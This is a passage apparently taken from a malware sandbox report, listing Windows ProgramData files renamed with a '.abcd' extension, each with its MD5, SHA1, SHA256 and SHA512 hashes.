| SHA256 | 0f8d7564959788a0cac5d4413265bbdd8a2ce5d86cf0effd563557a3c32695c6 |
| SHA512 | e0393cabb7eb1cac6312fd91f100b37fc2ddf24e475e38f028fad270d93fb596aedc4f53539e07cd7f3400efe77f2fef98ead3dd0a8749cf445a4cba40271887 |
C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\update-config.json.abcd
| MD5 | 39d7acb876e8fa4fc90ffe9dbe37fd22 |
| SHA1 | 431d29adc48fa52175be5a21be044c360af70ca5 |
| SHA256 | ddca18d07241aa642e69c2c1c0f27dce1391580b6403ec6063c26f311ed5c88e |
| SHA512 | 48770a67684ac847c3c240bddbbfe73f8b3b1b965b7384024d8835a0265b114b550049812e1921ee2f187820edca4f035435caedb7ed54f38c36b3b2b7f010bf |
C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol.abcd
| MD5 | 911a8581177dd3452a4b18d733088c33 |
| SHA1 | 484d7526e3b1cf16bfc8abd968a03dbad44df7bc |
| SHA256 | ebdc6de2021ec6851380570f7eb588cf223bd5dd4a39910bb774cc3334a26003 |
| SHA512 | 43b2ab66e5e30df7069400f6969dc3f2312307560f0664a0391095cf2faa30704014c27b618a3119c2a53a93a5c5bcbf538b6359ffffdfdce85379a4b7d70137 |
C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\3CCD5499-87A8-4B10-A215-608888DD3B55.vsch.abcd
| MD5 | 61d51a75d446b5d0fecb08a3fde1fc99 |
| SHA1 | 4a38100a6c4eee4330e10e793f5375d8ac03aee8 |
| SHA256 | 9b4ec83891acd69fae4d39702d46fcb2b29a44c5a19386345e714b6fe0bbd675 |
| SHA512 | 6d9f41211af66cec80381a78084c75d5bb4c64eb3be029620934414ffca8da542d083b09560fb478806d2d55d6ebc964ebffacea2c4fe273c39fe313e96c988c |
C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\2F1A6504-0641-44CF-8BB5-3612D865F2E5.vsch.abcd
| MD5 | a49486f0a1d1924e3e61d440b38acb6b |
| SHA1 | d854bc711e73f4aba379788b054e5ca575e476f8 |
| SHA256 | db00103e2c6172cf08ba0bd990007306261c2df6ef5d070f4c8a8ddd4fc86999 |
| SHA512 | ea30f937c5fd50dda4a7525dad413e116be735ce12998c0d713ab1d33a7d1af3a4ed8aa40820482ceee5b361f1462b204dce9e3376178a01db6ae7e37de82557 |
C:\ProgramData\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\154E23D0-C644-4E6F-8CE6-5069272F999F.vsch.abcd
| MD5 | 37e3990654aa063bb48af3b6ed346651 |
| SHA1 | 34317dc7ebd92d9046564e9b2b2c7a45509c933e |
| SHA256 | 628d6881e5f41d888a0b3fb64445b028961c82fbd341183e1e2c927c5e36ae59 |
| SHA512 | 790c65594bdf0c52359f56966f5c07702e06b384597f934cf455536a1afdccde51578ee8e8d65a5796d7fcea7bbf64b3af5f46ad5981cebea6f5581f941ab773 |
C:\ProgramData\Microsoft\User Account Pictures\user.png.abcd
| MD5 | 812b3f8d56f3fcb2c396da6fb59d9cc8 |
| SHA1 | fa23bc26f2b8cc069b7bae67b6712b432f3e75cc |
| SHA256 | d90bb38e30f03c93f5c37b3f42bfafa73a03c1c3da611726e7757dfa2f3e4895 |
| SHA512 | 123e132721755a1f3f987814f8a8826662dba9841266d77b512dc31ca86ca2c972ef48f3e27305d5c408796ecf6a4b0c3a02fffb76a88dc52bc4351f947c9e64 |
C:\ProgramData\Microsoft\User Account Pictures\user.bmp.abcd
| MD5 | 3628127658d78839911554a7f0068f05 |
| SHA1 | 7c41a08a3d068ea0914a6dcb17f96366e9b4c76b |
| SHA256 | 82f59a0137485d7d590b845ce5bd0f8de37411c6628c9f5d7ea86ed4cfbb5582 |
| SHA512 | 0f566a537052cabb7c51d615f82cdc216c307aa33524b5b71d85b231ffe03e0f8b56de8b60ac42fa4b43686e6b81f90948563f85e40c53f71af4d39e7375a0d0 |
C:\ProgramData\Microsoft\User Account Pictures\user-48.png.abcd
| MD5 | d390c05411ef2661ac4f8e07a5d05548 |
| SHA1 | 1233c8e1be80fb6a5997c3f0dcf20aed15ee36a6 |
| SHA256 | 5e6c029fb6bc39a69c9349f99b82826217b69afcd7d40f7bf7243c4b46cb25d8 |
| SHA512 | 97e3f1781095a7f5a6e8d2b9267215997e3366219f19fbcd3f11ac112ef255ed9bbd45d947cc3c9852a694863eeb9c7923be7b7883825f3b099d70a1e37be069 |
C:\ProgramData\Microsoft\User Account Pictures\user-40.png.abcd
| MD5 | f227e2648934ea5f15e35182ff43d711 |
| SHA1 | 70c66cfa8c171f732f8b7f6f165fdac3ef65a63b |
| SHA256 | 365a553dc61fab0db7d179a6e9978a8ec9ad6f9f3018732f22ad53d2e4b2304f |
| SHA512 | 4780a60b329a76c62091ea78a556c2ae562d849d088c148c515ba1cf1a13f8a8f998b7975107450176bba8784800384531e4b8213e0ceb730dd227485155e87c |
C:\ProgramData\Microsoft\User Account Pictures\user-32.png.abcd
| MD5 | 6889b649173ac209eeb2fa55debbfa61 |
| SHA1 | 0614a34cb85f83889e7eeccf732aedcffc6909fb |
| SHA256 | 916f39957de0c0069754af05dac170e449530524646b1540e2247be2d19acdd5 |
| SHA512 | 68d4e649536e9d6c7db9de0991c36f72b983fe0d4f35382a8efbdccda619036279db054fc0c136c9200398fd49415016f34549717ece96deed18da1adf4737cf |
C:\ProgramData\Microsoft\User Account Pictures\user-192.png.abcd
| MD5 | 10044f82710efce1dca8c2be51f557c8 |
| SHA1 | f72ddf1c5cd7e7d5e1c2143e4f3efdefacfcba91 |
| SHA256 | afe7d5371e33c84cfc3474801cd3d425fa27ccfba3efb9a77f73d9d501aff80d |
| SHA512 | 4578f6656a8aca4873de548b0b7067de2c3bf709c9ec1c936397404bc7ed9615e2061bd350866c256f4bb00e30be5848bcf5ba5b3ea591a4562bd6ed5a462c48 |
C:\ProgramData\Microsoft\User Account Pictures\guest.png.abcd
| MD5 | 5cedfd8fc3bf3ca2c5be9a3baaa294e2 |
| SHA1 | ef07cd11dd45b066900c658a12db8e80ee051807 |
| SHA256 | 8da009b2030bcd06bdae2d272a09d48ab1097bb9f2015946544c4a545cf59367 |
| SHA512 | 208d0f5333230a74c0fc5145e995e0f328b83d90893f449e1d751455454e5565284b921766278065fc70370d2f68ee98d8dcf87723e46554c50ebf08f7820707 |
C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.abcd
| MD5 | bb1f58f506fb09764306f78d9f7a2954 |
| SHA1 | 47eef87f0fb4891c372d0fed9ec7d27a98d89cf2 |
| SHA256 | b89c1265f1feddefe31ef2dd8b207172b7531f6dbf323383f3513625dd7bf9d3 |
| SHA512 | 6aecf45a63b1ad5ed082486183c4ec3fed74f3bc7694b48c6f6159b87cd2a7516e8897a845968d718d25da16083ac3d258a8676e442073f9e12fc3e6f90b80e4 |
C:\ProgramData\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.abcd
| MD5 | 1c888d38b7e4c6c8abf5c1e11dbe76e5 |
| SHA1 | 929b6f6807b243a0eae393d68ab1d34bbda04e4b |
| SHA256 | d021c7df614185174f964ca2db786d12b2b4e0459a2c64d551a4f5c7c3edfdea |
| SHA512 | d86e7036a02ad0d433c2d4ebf177a6f7e3409c09b333723b1682005d53ad4e059e44f7919b8544ebf0e7336905d2d09709fac243708eba829ef7c0f3b008d66c |
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbtmp.log.abcd
| MD5 | d7e502d8068a7c8160ab3146792e1578 |
| SHA1 | cb46e9b47425ae16658f0cbb4fd7c54bda71794f |
| SHA256 | 46b44b3678ba68aa90e9f44a78d42108b7d7fc82d6e395da167a05f430e9d7ab |
| SHA512 | e0a0e2b10ee4d1093b6fa6cb138ca3b0ad0b25a000940c6444839ecd242a19b34e86a5081a79fab2c5ae4599f5bca6226f5fa6d83b7762ad715f94771546ea7d |
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00002.jrs.abcd
| MD5 | 86d795351704a1b2700a126a7e280fd7 |
| SHA1 | 4e1373baa4c1e4be79ec4985da669bc69b7d4e4a |
| SHA256 | 848f2de7be6780cad5d9833aec197244e1f67c7886f0e4146d1fba297536597d |
| SHA512 | cb32a9fee4b4825740f12fda54b021b2536d6527070fca642ff62e8ed22c7f4e2261f3168119f6a969093e423f653081747c0f21413d80d5563c2e11d80f45c7 |
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edbres00001.jrs.abcd
| MD5 | e12dad2740ee32dee6368aeff5aafdd2 |
| SHA1 | 2cf94f42a37c4016043d8549a9fa756e230707c4 |
| SHA256 | 5125f5fdca06bc3c86b2861aec9f980f50ba375f1cb4345ed752a2de34bbb44a |
| SHA512 | be8da391852c65b76883008bd29189ad6e676799ec1425225bb539c1b3305f65e49bbe3795a176b9992872bc28932c951107a35ca9b55172d8d3331691d102f3 |
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb00002.log.abcd
| MD5 | 896e64038938d75656e9342da6a52c66 |
| SHA1 | 39bea5135c710165d2907fcd0ae67f3e9627d6f5 |
| SHA256 | 91f6a0487a64cd2350bddf2b0a178afd18ea9ffaa4d541b5656d55632ea81569 |
| SHA512 | 26fed70e7cfbcfc5ac4a6675957ab38e375b4cf8fc2ec7645d371e2928b29c1ec72bebcbe936c20043b6af3779eb3a8b6b308e133ce41f9e955be69aa3b0e7a2 |
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.log.abcd
| MD5 | d2c022a701934bff726eb1344b79c97f |
| SHA1 | 0628c28e14bdeadc4f0ae2d8911abdc5c0dd935e |
| SHA256 | df8106aed0a28bbda97b36a2d2302b9c7d1206dedc4d95aa9dc6b730e92f631d |
| SHA512 | 9567c584a18d05f927ce995d8f0d9b0596c898e81add6620cd7da401507d072400028bc24f54bee476f983f4fbd9bdd40c1e429094ae8ac4afc7bd0eafda3ca0 |
C:\ProgramData\Microsoft\SmsRouter\MessageStore\edb.chk.abcd
| MD5 | ce81d95c5973fa4e99c4cf9ada0f79d8 |
| SHA1 | b94340e5948604aa3a39edd8a8e77662750f5897 |
| SHA256 | b111bde5dd914d9e2c0cc9512318fea34bca4808d5029a020eb1c731ee65911b |
| SHA512 | a4d418237e4c78edf2998476b21ec3061ec5cd5ca088f27d3da0ad1510d35337b0c8f931526ef6ba9446f933709dadf5a947d9066d659bd7fbfa737230e92a9a |
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm.abcd
| MD5 | 6ebf35c29510f9d12d89a8538500a447 |
| SHA1 | bddb733869a798433f00826832c8dd711342e7e9 |
| SHA256 | c7d0541a88cff7ef171ea843f929060ca8cb6a9f805c3c0bd3fec05059380b23 |
| SHA512 | d1275250d944f36d8e47c4593ec39bb953d16d50ed0aabdaf15a1e83d0e3a8b17b4097ae6d380be56edf2e3f4af69fd09f7c848c985014e960d8d694d18dceb3 |
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.abcd
| MD5 | e464a6ef9555702f914c9c9e348c103f |
| SHA1 | 88c2b71fa6ea47f25434b11e6af0b7f09d6d6cb7 |
| SHA256 | 34e865281e55a16fc6da6e7ccd2a6ea2f3a3d8feb621e91efdb7e2fd86e9f833 |
| SHA512 | c044e619e3386e07ae4adae38bd30d9d5c0197979a24cf825d9367e03c92bc365f79b6e4a481aa934c3467e671706224b17ee7f261c8fb633cd87419d99922dc |
C:\ProgramData\Microsoft\Network\Downloader\edbtmp.log.abcd
| MD5 | bc9c4d3e2423afb9fd86e2f3862cd8f3 |
| SHA1 | 27d0347b8a4665e2ba0986d7b604647271117417 |
| SHA256 | d79514f416ea362231ea50a95c77f0b4f18d1305de501ae02c3a53f2ec8363da |
| SHA512 | 08551fdbfe2b9baa812235172bb0bec842b005309b96441e96bb4218ea77c0e0afe6e4235469bac9f6475413751bbb701ef7eeabdad935189db2076504963b0f |
C:\ProgramData\Microsoft\Network\Downloader\edbres00002.jrs.abcd
| MD5 | dd061fc6c39c6434010ce0af14951460 |
| SHA1 | db705395585b24b849a22149c0a9248caa7e8cb4 |
| SHA256 | 47c1a60b3b32d4ee8b8134ea3a5a694ca0ce3c144bea57c4e53ba7131532a2a7 |
| SHA512 | d2bf133d9e594e90e33b519652ed51a60b5f45660f95f7842e1a5bdf943d8e7d598ac5244549a1ff69dde24c926b6ace7e0aefa33173256c81035c099c54af9a |
C:\ProgramData\Microsoft\Network\Downloader\edbres00001.jrs.abcd
| MD5 | 675f8301a13356af6455f6eae5249d48 |
| SHA1 | 5a70eda266686ef60fbf3790e435bc2cffb069d7 |
| SHA256 | 65fa23d75a38a2ab4a9e656a7469e866507d749f17f6dbdaf5b54693b1beb31e |
| SHA512 | 9fefd97770c629fa7d96f6cfbb7640defad51c4409d1eece56a5179a6521af1e1dc7b1d69deea228f09156d825c5828ad576ef73e80f20ad6e08bcb1f872dc90 |
C:\ProgramData\Microsoft\Network\Downloader\edb.log.abcd
| MD5 | c65234c2ddcd410ddad0c077b2dc1c74 |
| SHA1 | b1af5acfa4f974d31011657de40b49928024f15d |
| SHA256 | 117902c443c2aecad3a50e9916c4d2a0a3ee612dbabbe0b7c9c95de3305ba642 |
| SHA512 | 26efcab8484b7411ea7ab56a7069db78995dda0e72d072ff5eb693a99fbe38a47683179be55973a8770ce1fd807c03955805c48d679f12d54b798d0e9f4ce69f |
C:\ProgramData\Microsoft\Network\Downloader\edb.chk.abcd
| MD5 | 816ce0dd310c3afc5766c42891a9680f |
| SHA1 | e45971c9a0c40cb379232045f37aff9b2e07ae65 |
| SHA256 | fb612d33cb4ed71455785288b1fc554dcbb540b28116609259b1fef33ae160f6 |
| SHA512 | bd1539ebb82e4a1b48415d9b0f2092c009de6cf386d305b4fd0f4935b6d88be320d8c4f51407c0376ccb40905e1fbb1f2b52e9d2e1af1475c8df75f5e45e29eb |
C:\ProgramData\Microsoft\MF\Pending.GRL.abcd
| MD5 | 4c73a384a2bf3389321b87a916bbdb12 |
| SHA1 | 0f5d2974fe4311b2c11852dff707902c7e6aefbc |
| SHA256 | 35104b41bd7ce7d85689e4f851110b5454e5e50e72aea6433ee75cbb2922c368 |
| SHA512 | e92bbdeef45fc2ab4e96bf43fda51e5b733f86addbbe25440129c538d4ae562c1fff6195a8bb7d0562cab384ec6dc799efcaaad32ab2740cfc149235f1ddfe27 |
C:\ProgramData\Microsoft\MF\Active.GRL.abcd
| MD5 | 7701be7461fa88da2209905194871592 |
| SHA1 | 8f73522f3f7445e450c4fd9e654b2ad845c9cd53 |
| SHA256 | a247ccf1f1c3e10854e660deca5e9d0449a550a965ca13accceb10f25e7a95e4 |
| SHA512 | bb948f219eb2d74b7cc3f93cf347f543ab91a16a2c26a2c7c0e2faf6562abe2d9e7174c1679adfd2dfceb73c374572fdd7dedbabc1a1032ce0d0782decaa4c1d |
C:\ProgramData\Microsoft\IdentityCRL\production\wlidsvcconfig.xml.abcd
| MD5 | 9547cb0f6de5e3cac4b72dbb74eae361 |
| SHA1 | 32876b92d7d63fe3fb5e68e85f5f8d166dc77619 |
| SHA256 | 14d72553a7e7e4ad8eace311dc14fde829f087dec07902fe6c7b36c96e1b967e |
| SHA512 | 1b4823470b56716f57ae37f052909b68e668af22989d8a5c2c7540416a5296b13d8a8271e4c37b9e6ac6f17a61fcdaba2fef10aac4591d69eecf0ffd1f286777 |
C:\ProgramData\Microsoft\IdentityCRL\INT\wlidsvcconfig.xml.abcd
| MD5 | ec743cb97e7fafdb8ae6b5090502ca6b |
| SHA1 | 7fbc5ed78d6db5dee35a8cf87c28929bc796b2ed |
| SHA256 | d59d9be5be399659dc65315a068045a2e344cbd3c8704255499d688ed12c6471 |
| SHA512 | a8d09239cb7a608cb9ae7fa82bd49d9598b22b9007931d25da39d34a6caa1a9df6f47b7cadf6c58aba446113b568ac3cc077ea6b8528f4c092b670a04198f3fd |
C:\ProgramData\Microsoft\EdgeUpdate\Log\MicrosoftEdgeUpdate.log.abcd
| MD5 | 63f16ecda6a33a36eecaea14d04856de |
| SHA1 | 6964871b5ae9bf27bd633662746d9a75d759de44 |
| SHA256 | 95a0600e09fe143f6e597dd2c0da0140c3ac4b03c80c590466151940187958df |
| SHA512 | 9e84a4442a7c6747910beaf776219607ab4e20345580375f7f2cad52c704b09a9057708b634d2eb45173cc105f691afec70d93cb1d643f809a18d6d8a5698204 |
C:\ProgramData\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_DeviceProvisioning_2023_12_15_12_54_43.etl.abcd
| MD5 | 8c6675d80a6cc356d2288cf3cd62a86c |
| SHA1 | c7988feb4afd3b22dc8107edb8a617308457009d |
| SHA256 | e31f0df26130a4db7cab73b7c00ecb3b6c609baebad8825989a2a27b998ef932 |
| SHA512 | ed57a50b3abec789938ecf4b2b9bff08e92e94a071af426957ded39cae34b7e34f5cd5a88166070b18bedb91521ee3abef1402c06e4b483c57cc1ff9bb2bfd6f |
C:\ProgramData\Microsoft\DiagnosticLogCSP\Collectors\DiagnosticLogCSP_Collector_DeviceProvisioning_2023_12_15_12_54_12.etl.abcd
| MD5 | e41519d9c49379e0472275e45e09a0bb |
| SHA1 | 400dc92207ecc063f91a1f0fe865b451a8cd3275 |
| SHA256 | 0f2775bb66bdcf2aee4c02ca253bb7be3948e0ec288ca7cf3d0501a67d844d6a |
| SHA512 | 705a2912923240a6ea166af6158d3db7ab24c5ed16230add07622c09088172f16d574a041c1b866942c02e84261b5e39768cfb64a3a8053fb3242042bc31c472 |
C:\ProgramData\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.abcd
| MD5 | c26c5f7d236c751058f80e223d1971f0 |
| SHA1 | c0293e3ace15d9127ae867021a88856e856fdb3c |
| SHA256 | 4a44f91f397b130f065a6337a470752521d72bc6c13a62b9e793ff0e37b27b7d |
| SHA512 | be77ae8cb6cc5671237badf7b3cee9cdcde7d334b4a0dda12805c46328b7d8036d4af5c7e10dde10bc79648a808a6d31887e7113930e38cfd642b2db1c86349d |
C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.abcd
| MD5 | 44d227da316c18a3c8846812f47d0cfc |
| SHA1 | 199a1fad5eecfb0c16f1559573c7a5064bef59c9 |
| SHA256 | b2088dc7aea048849a2f427cffcf89ba5719fdf35e07e778945d6f0e7c526042 |
| SHA512 | 63efc335f3692529e33c6a2ed842295cb237e54220ef9fe59778a9d78c0f5b63e66264fe42837c2c000610695b9a8879e1612e71db4d9da1cc4cde0a765393bb |
C:\ProgramData\Microsoft\Diagnosis\EventStore.db.abcd
| MD5 | 31f4a2e3733a2a672336f0df0c91ec8c |
| SHA1 | ac54d3dd04e347dfff386ad4b955e38e2699a5b1 |
| SHA256 | c1c271adde1bc872f231ba96ef9c30482ab7b8b1aa293d577ce3956dac88a4a6 |
| SHA512 | 4c4489c644028ad800db2fa0b9d7d53bb7a01d00f457baecb2c41d70a6fc636cbabcef0ef765cf8c1757ad5b379d79f14784b5111a7b7762a36548fe7f37d8da |
C:\ProgramData\Microsoft\Diagnosis\ETLLogs\ShutdownLogger\Diagtrack-Listener.etl.abcd
| MD5 | a62e118f16ebf21793fc9bca59c1efb9 |
| SHA1 | 398440c27a1f32ba6f4dacbbaea6939ab1fba837 |
| SHA256 | b1d4fec300b7e4bc8cf56fb22a9b29b6273b13aa42b3937d9d45d21babab9902 |
| SHA512 | 2f8942f58aac94a49516b393eac8b7176e4e0819f03b5aaf80369ec46abfbf7d1b0c6adb22b8da58ef240f81a8952adb1a133b5079d8034b214e41f1b6ecfb40 |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json.bk.abcd
| MD5 | ef50c66f6b9c68be653d1d1d3a60868c |
| SHA1 | 36ea9dd6a067e02ee21f5fc5e89b04ca66fdb02b |
| SHA256 | eccdfe1a35d3e5a1a69bbb418ae27a0e987114d870cde17eed07f960d13e3d9e |
| SHA512 | d0e5ba0d0ef18a6d17741c1bd4050d053682ed82076dbeb9445e0e19732a007cefaa6bea78876877f205bb6718fbbf4b0ba43a2e30940f90a038ba36d2dd822a |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.tracing.json.abcd
| MD5 | 0993eae6d42d368fe29b8e9e9939160e |
| SHA1 | 3a81c68b0712221328d99874be1b05081f811bcb |
| SHA256 | 95e75ede27e3682108c2577df7bba20589d0b8c4de75bb677addf800ecc35145 |
| SHA512 | 2c4409d1876a2d994ce886704b4e295b75601e4dd9037b1f08302fc802765ba123b30fb641a2a85e199e00fa2da6c3896cbb7d37ec109ab663870183a1bd0922 |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.privacy.json.abcd
| MD5 | a3da7b5f84229fc1b9dbfb92e4b12170 |
| SHA1 | 6a99536f8b4469a9d46da34cc30fb43bcb62c48e |
| SHA256 | d6d2f39fc23fd1ab09ba2d4f5fbdb02f3cc2ef4d55714483e12e06f96f1a8ac0 |
| SHA512 | b39cc7dfee71d20c0d14e0050c3e8ccf9c991a6fdece89bc991f06a87548d5cdc61bf6891de221484a1700e3af771080bc5591da748624c5b2fbf08cd027ae1c |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.cert.json.abcd
| MD5 | 7aa62c8e5969a83de8dc5d7ec9d60311 |
| SHA1 | 4b75156b1f26b5c55459468a4b46b98630f41425 |
| SHA256 | 0f4f4f914e5c63e0498a1477b5c835fbe6e244d116b6a77e3f76713a596bc19f |
| SHA512 | d8c7ebb9955fa6b73c8da5c95407e05c1824e8270ea96693aba7e632f01b9689a5c7aeada6f2b61238d4a9be9cb187aa5f823dd4896ce1738ee6408a83e77a2c |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json.bk.abcd
| MD5 | 3c1db890003e89cc3d4f0cd9de6e9cf3 |
| SHA1 | ca5085dc575114c81f954b422281779989b7ff55 |
| SHA256 | db134ed173e59c4a4a9ec2f11e0a3a8c4b07aa47f8500f8920ac79e32bc4a8b6 |
| SHA512 | 161b7745f4f9e14a301e20d07621c2e599274d52da9003713b14e26fbb8147a08bdc328150d32f0296e32d161e1f0225ca6311abf1eb3b2d8f85b9386f18ccea |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.app.json.abcd
| MD5 | ee481d894d66e429753710a877559cce |
| SHA1 | f4e0719c847ee5a3d8e3be43c63591c2399a8434 |
| SHA256 | d25912f03f79ae05bad486be7998a360768d814b9cf1e8067846e4ed541bdb01 |
| SHA512 | 0eaa2efd3b103526a5d68aa5c0344ee6f63a8ae2aabf79502c2dd817ec5c46476b2ea817fb772571203f2edb96f4c7e0e93d245f522554a660c6e282456b5b9c |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\utc.allow.json.abcd
| MD5 | 0ad5101812890aa44c4d8637eb5a9ff7 |
| SHA1 | bbd586a407c5536b7e4a7c6d1ad69d18ca953224 |
| SHA256 | df667262ccb03f57f82824cfeeccbc2a9518da39f5f9abc819ae45eb730b73b8 |
| SHA512 | caec40a548162317f8914eb55e221e80e233cf809d36faed5346e92dc56025d10cd5b45367cfc6b7f28fd8373ffac98e164eff06f78de72dfde7cb49ae3ff502 |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-Eco3PTelDefault.json.abcd
| MD5 | e9b388fc62a8a1e22d4b77ea5cf5a43e |
| SHA1 | 61245734740bbceab25b5faf8ce891705803f65a |
| SHA256 | b3419c74a7c4cb229b0e4f2c386433d82e7c7d8789e3b1a15635ee9047b25d23 |
| SHA512 | df797802ce17b323de4de9d18b71f597320e41af36b547ef8a970bbd3d49364556f6a00bb1c311b8cbe06dfb6c169bee3e79f299bf8ade9c84232745e87c1ec4 |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-d5a8f02229be41efb047bd8f883ba799-59258264-451c-4459-8c09-75d7d721219a-7112.json.abcd
| MD5 | aa2000f1e9d13573ea490402ebc6cebe |
| SHA1 | f2b702786b470a5359a890f18c99ad7a144e33d5 |
| SHA256 | 6028c653014d0876a960f82d72bb943d3a18c158ea667974f0098ae06758158f |
| SHA512 | 8b3e100442714218ddce371a68f88d6bb49265f352bce981ee4dca2d912a4f5add9a82cc67b894e45d3ea11d7a236a2635c936671d293172400489f3e90a93a0 |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-af397ef28e484961ba48646a5d38cf54-77418283-d6f6-4a90-b0c8-37e0f5e7b087-7425.json.abcd
| MD5 | 8f10ec790696215f88d1582f835792a2 |
| SHA1 | 8ed8cc3d39a6d40d8c9594b679a20192585bed3f |
| SHA256 | 7528e8b4bb37d28d51ba225ea6af2b3d612114d7da79066e53176ce1b242d642 |
| SHA512 | 9a8d8612ec67526a86128b65d45f4fdc6a4eb7c36800e6342dc0daeb313ce77d3ad9f751cdc73c38244f177fffd5cb103cac167ab86fd9453490a2abd6c2bff9 |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.P-ARIA-4bb4d6f7cafc4e9292f972dca2dcde42-bd019ee8-e59c-4b0f-a02c-84e72157a3ef-7485.json.abcd
| MD5 | 6d68780f5eae197b7e4b0fc608e819a3 |
| SHA1 | cd27ba3f3410133514476eb0e3449d4bb68d9810 |
| SHA256 | 884f3085bc6d821165a451866e57e690cf61ae847364b40adac63d6e62f9c001 |
| SHA512 | f69b86d0ee467776cedfd7c356416be4470f40693966f069dc05b151fcccfa6a4bbe97f551d0eb93573131b29a5e454425ff6c45fd36c97e7a85213469a5bbf4 |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\TELEMETRY.ASM-WINDOWSSQ.json.abcd
| MD5 | b5abf7dd045851767b9081d51fed7d9d |
| SHA1 | bd37653c72d1d220b2fe978fdab0342732dae2e7 |
| SHA256 | 42bb6cc4bdb31cb7e0e91611b7343d61602c04a30974966d0c5a39ff79080ebf |
| SHA512 | 914ccd3e2cdccb8ca49d207bbb3cadfad33d3e09ad50786bc20c6e142162d9440dbf2b332da5c4ac3a133fe0e2b691731857df3ec6181fe99e184d5b958f87fe |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json.bk.abcd
| MD5 | 3209d5f6da219e891ccc611c8164fbbf |
| SHA1 | f9182935f8f1a31c37c167a71070d251735238a7 |
| SHA256 | afb64ac3fd22b36acbc6307dfbed03f313c241b4d5a9f727111b91559636f79f |
| SHA512 | c0f005e4a879c7788dde4dff05d28ad752f9ef77d93b004d7a88fa25273f6ebea5e050b275360ef494093867e3940bf7d839675ecbda0fd42e261d5aaf4a0884 |
C:\ProgramData\Microsoft\Diagnosis\DownloadedSettings\telemetry.ASM-WindowsDefault.json.abcd
| MD5 | 2403aa5bfe4529146d37c4d890f59a30 |
| SHA1 | 2952e12da43c4e95017bdc6d7917970f5cea0c3e |
| SHA256 | 92c6cfd0a9ab72df66fff75be81c6391638a692e489024465c0bb0e00a8b98a5 |
| SHA512 | 413d304172e6187b41f650d713a8c82984d6d06057d65168cb7bf9312748833a07a9b016cb17f4fe246a15ef752213d22ff67496a4b10f4343bd4b3a7f76bf50 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\C2RManifest.office32ww.msi.16.x-none.xml.abcd
| MD5 | 5c785777cd0f91e97cfa116ab4f8dc5a |
| SHA1 | 44828f9971f27b65b19c4df0296ceef3e7283a56 |
| SHA256 | 3670a5ff0d77677c27271f555c70ab37e5deea155ca20e7b9d5fe225bec5c3f2 |
| SHA512 | 94f87df335ef65a62495519d253d19732a97b75455f2f0b03eab00c1ecf09b759a432f72e50eec978267242f9d18ecfaa125deda6ad7c34aea852c7d1cfa1649 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\msoutilstat.etw.man.abcd
| MD5 | 50aad5b83b9f9a213d9c2055bbc0179a |
| SHA1 | fac2f64d7236767fd1e08c6e81b3d36a78354dc2 |
| SHA256 | 31f25b615f665a6e37063efa67fae76ab64a10ad3e7b3314940f05c6471f0b08 |
| SHA512 | f1694e2fc5821a1f8408d73a620e8a33a923e9dda6ff78209efeab2ef493b83a887a28964ff434450cf01a4bf7e684d3077fe0d462aba82ec2fa69a98d934466 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_OfficeTelemetryAgentFallBack2016.xml.abcd
| MD5 | ca120819a524cc34c683469f7d84037f |
| SHA1 | 2679e866cc81bfa3deadef733c3ab47297a42f9d |
| SHA256 | 8a1127f53bf794cb242fccdc67b6efb71ed688c0f91fcc97a612324f2f1069b5 |
| SHA512 | cc4cd912e5a54e3fbeaa07da925a78ab50dbcc7ad2164a43397e78c7d34ff72ce7e4f05e124066a8a0bb703b135ce852c6736b1e5ee8f7199c5c67e3bf5f6201 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Feature Updates.xml.abcd
| MD5 | 4fcdc66ba7c3949bb3f5a9b24867d611 |
| SHA1 | ef2181765709a2faa84dda5e04c24108b14e093d |
| SHA256 | 70b0634d556859750c551e6c93bddd9dfe957b7879b132fc9876a6838155507b |
| SHA512 | 988602a9bf326cfd1f64e74238aabb55e8fd302fa321d0c57e2029f3ae0593a884f3d35225270c5e230ccecdd6528d5973c1ef8f28b2f7482b81236c3efca500 |
C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\Microsoft_Office_Office Feature Updates Logon.xml.abcd
| MD5 | c1c143caff40e3f04b3b1aff47da922b |
